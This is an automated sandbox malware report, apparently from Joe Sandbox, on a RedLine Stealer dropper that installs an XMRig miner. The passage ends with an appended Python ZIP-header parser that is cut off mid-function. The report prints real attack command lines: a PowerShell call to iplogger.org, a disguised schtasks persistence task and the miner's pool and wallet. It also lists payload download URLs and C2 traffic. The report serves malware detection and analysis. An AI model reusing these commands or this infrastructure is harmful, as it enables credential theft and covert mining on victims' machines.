
Analysis Report 8TD8GfTtaW.exe

Overview

General Information

Sample Name: 8TD8GfTtaW.exe
Analysis ID: 356507
MD5: a5d3fdf55abb54ec0b632dee9d3459d4
SHA1: c177421eb77f0d341e5d1bd6cfbccb60e0c86a1c
SHA256: 677618666eb31c80e9dbecb17907676d2da2a39d24f7c20785ef577239ef5e6f
Tags: exe, RedLineStealer


Detection

RedLine, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Binary contains a suspicious time stamp
Connects to a pastebin service (likely for C&C)
Detected Stratum mining protocol
Drops PE files to the startup folder
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • 8TD8GfTtaW.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\8TD8GfTtaW.exe' MD5: A5D3FDF55ABB54EC0B632DEE9D3459D4)
    • nulhfhsi.exe (PID: 6988 cmdline: 'C:\Users\user\AppData\Local\nulhfhsi.exe' MD5: 70DCA411445D3B4394D9C467BF3FF994)
      • evs.exe (PID: 6396 cmdline: 'C:\Users\user\AppData\Local\Temp\evs.exe' MD5: 8C373745D8604DA05314DE16F0BF7CED)
        • cmd.exe (PID: 5964 cmdline: 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • hello_C# (2).exe (PID: 6252 cmdline: 'hello_C# (2).exe' MD5: D6B9F530E7E8DDEBEA8069A0D94AD38E)
            • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • hello_C#.exe (PID: 6800 cmdline: 'hello_C#.exe' MD5: D6B9F530E7E8DDEBEA8069A0D94AD38E)
            • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • jo.exe (PID: 4948 cmdline: 'jo.exe' MD5: 28E49F705BFD5A6785391BAC1C0E3359)
          • powershell.exe (PID: 6420 cmdline: powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • revs.exe (PID: 4784 cmdline: 'C:\Users\user\AppData\Local\Temp\revs.exe' MD5: 029CE2E532FE5C70D3342F978F5463D0)
    • lxoqz3o0.exe (PID: 5748 cmdline: 'C:\Users\user\AppData\Local\lxoqz3o0.exe' MD5: F0ECEFED65B00699CC2B57BF81492F56)
      • schtasks.exe (PID: 6212 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cpu.exe (PID: 6272 cmdline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 MD5: E95F766A3748042EFBF0F05D823F82B7)
        • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RantimeBroker.exe (PID: 6352 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
    • schtasks.exe (PID: 328 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cpu.exe (PID: 7072 cmdline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 MD5: E95F766A3748042EFBF0F05D823F82B7)
  • iexplore.exe (PID: 6064 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6360 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • Chrome updater.exe (PID: 5056 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe' MD5: 029CE2E532FE5C70D3342F978F5463D0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Windows\CPU\config.json | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth
  • 0x32753:$s1: stratum+tcp://
00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000011.00000002.528913817.00000247A05AB000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth
  • 0x22753:$s1: stratum+tcp://

Unpacked PEs

Source | Rule | Description | Author | Strings
37.2.Chrome updater.exe.400000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x8284:$s2: .2265|ii
6.2.lxoqz3o0.exe.f0000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
14.2.RantimeBroker.exe.1130000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
25.2.revs.exe.400000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x8284:$s2: .2265|ii
4.2.nulhfhsi.exe.3b0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Sigma Overview

System Summary:

Sigma detected: Xmrig
Source: Process started | Author: Joe Security | Data: Command: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, NewProcessName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\lxoqz3o0.exe', ParentImage: C:\Users\user\AppData\Local\lxoqz3o0.exe, ParentProcessId: 5748, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, ProcessId: 6272

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://blog.agencia10x.com/dance.exe | Avira URL Cloud: Label: malware
Source: https://blog.agencia10x.com/mex.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: blog.agencia10x.com | Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\evs.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\jo.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\revs.exe | Metadefender: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\revs.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\nulhfhsi.exe | Metadefender: Detection: 21%
Source: C:\Users\user\AppData\Local\nulhfhsi.exe | ReversingLabs: Detection: 65%
Multi AV Scanner detection for submitted file
Source: 8TD8GfTtaW.exe | Virustotal: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\evs.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jo.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 31.3.jo.exe.860000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 31.2.jo.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 31.2.jo.exe.850e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.nulhfhsi.exe.3b0000.0.unpack | Avira: Label: TR/Dropper.Gen

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: conhost.exe PID: 5544, type: MEMORY
Source: Yara match | File source: Process Memory Space: RantimeBroker.exe PID: 6352, type: MEMORY
Source: Yara match | File source: Process Memory Space: cpu.exe PID: 6272, type: MEMORY
Source: Yara match | File source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
Source: Yara match | File source: 6.2.lxoqz3o0.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RantimeBroker.exe.1130000.0.unpack, type: UNPACKEDPE
Detected Stratum mining protocol
Source: global traffic | TCP traffic: 192.168.2.5:49730 -> 51.68.21.186:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}
Found strings related to Crypto-Mining
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp | String found in binary or memory: ID: 6272, Name: cpu.exe, CommandLine: "C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: conhost.exe, 00000011.00000002.528975552.00000247A08D0000.00000004.00000001.sdmp | String found in binary or memory: XMRig 6.8.0

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\jo.exe | Unpacked PE file: 31.2.jo.exe.400000.0.unpack
Uses 32bit PE files
Source: 8TD8GfTtaW.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49744 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49745 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49746 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\jo.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.67.51:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.107.52:443 -> 192.168.2.5:49741 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: 8TD8GfTtaW.exe, 00000000.00000002.268372071.000000000139C000.00000040.00020000.sdmp, lxoqz3o0.exe, 00000006.00000002.498547574.0000000000100000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000E.00000002.501902431.0000000001140000.00000040.00020000.sdmp, revs.exe, 00000019.00000002.500038394.000000000041A000.00000040.00020000.sdmp, Chrome updater.exe, 00000025.00000002.500186949.000000000041A000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WinRing0x64.sys.6.dr
Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: nulhfhsi.exe, 00000004.00000002.444265627.00000000004B6000.00000040.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\evs.exe | Code function: 22_2_004062F0 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\evs.exe | Code function: 22_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\evs.exe | Code function: 22_2_00402765 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\jo.exe | Code function: 31_2_008B7AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49743
Source: global traffic | TCP traffic: 192.168.2.5:49730 -> 51.68.21.186:4444
Source: global traffic | TCP traffic: 192.168.2.5:49733 -> 87.251.71.75:3214
Source: global traffic | TCP traffic: 192.168.2.5:49736 -> 193.0.6.135:43
Source: global traffic | HTTP traffic detected: GET /cpu.zip HTTP/1.1 | Host: 195.2.84.91 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings" | Host: 87.251.71.75:3214 | Content-Length: 136 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo" | Host: 87.251.71.75:3214 | Content-Length: 1101816 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks" | Host: 87.251.71.75:3214 | Content-Length: 1080046 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/IRemotePanel/CompleteTask" | Host: 87.251.71.75:3214 | Content-Length: 1080072 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/IRemotePanel/CompleteTask" | Host: 87.251.71.75:3214 | Content-Length: 1080072 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 193.0.6.135
Source: Joe Sandbox View | IP Address: 104.23.99.190
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49744 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49745 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49746 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Feb 2021 08:11:30 GMTContent-Type: application/zipContent-Length: 6296834Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Sat, 20 Feb 2021 21:11:22 GMTETag: "601502-5bbcb02b93280"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 
3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d b
                  Source: global trafficHTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
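The response captured above is the beginning of cpu.zip, and its raw bytes start with two ZIP local file headers. Decoding them by hand from the hex on the page gives config.json (deflate, 703 bytes compressed, 2,275 uncompressed, DOS timestamp 2021-01-26 15:16:02) followed by cpu.exe (deflate, 6,287,652 bytes compressed, 6,889,640 uncompressed, 2021-02-21 04:18:40); the DOS timestamp is the packing machine's local time with no zone, so it need not match the server's Last-Modified header. The block below is an added example written for this page, not sandbox output and not code from the sample: a local-file-header walker that recovers member names and sizes from a partial capture such as this one. The two header byte strings are copied from the capture; the in-memory archive and its contents are constructed stand-ins for cpu.zip.

```python
import io
import struct
import zipfile
from datetime import datetime

LOCAL_SIG = b"PK\x03\x04"
# Fields after the 4-byte signature: version needed, flags, method, DOS time, DOS date,
# CRC-32, compressed size, uncompressed size, file name length, extra field length.
LOCAL_FIELDS = struct.Struct("<HHHHHIIIHH")  # 26 bytes, little-endian

# Copied from the report's capture of the /cpu.zip response: the first 41 bytes
# (config.json header) and the 37-byte cpu.exe header. The compressed data that
# sits between them in the real stream is not on the page.
CAPTURED_CONFIG_HEADER = bytes.fromhex(
    "504b0304140000000800017a3a526777191fbf020000e3080000"
    "0b000000636f6e6669672e6a736f6e"
)
CAPTURED_CPU_HEADER = bytes.fromhex(
    "504b03041400000008005422555275cb47e424f15f00a8206900"
    "070000006370752e657865"
)


def dos_datetime(dos_date, dos_time):
    """Decode the packed MS-DOS date/time used in ZIP headers (2-second resolution)."""
    try:
        return datetime(
            1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
            dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2,
        )
    except ValueError:  # all-zero or otherwise invalid fields
        return None


def parse_local_header(buf, offset=0):
    """Parse one local file header at buf[offset:].

    Returns (entry dict, offset of the member's compressed data)."""
    if buf[offset:offset + 4] != LOCAL_SIG:
        raise ValueError("no local file header at offset %d" % offset)
    (version, flags, method, dos_time, dos_date, crc, csize, usize,
     name_len, extra_len) = LOCAL_FIELDS.unpack_from(buf, offset + 4)
    name_start = offset + 4 + LOCAL_FIELDS.size
    name = buf[name_start:name_start + name_len].decode("cp437")
    data_start = name_start + name_len + extra_len
    entry = {
        "name": name, "method": method, "crc32": crc,
        "compressed_size": csize, "uncompressed_size": usize,
        "mtime": dos_datetime(dos_date, dos_time),
        # Bit 3 set means sizes/CRC are zero here and only follow the data;
        # the central directory is then the only trustworthy source.
        "data_descriptor": bool(flags & 0x8),
    }
    return entry, data_start


def walk_local_headers(buf):
    """List members by walking consecutive local headers; stops at the central
    directory, at a streamed (data-descriptor) member, or where the capture ends."""
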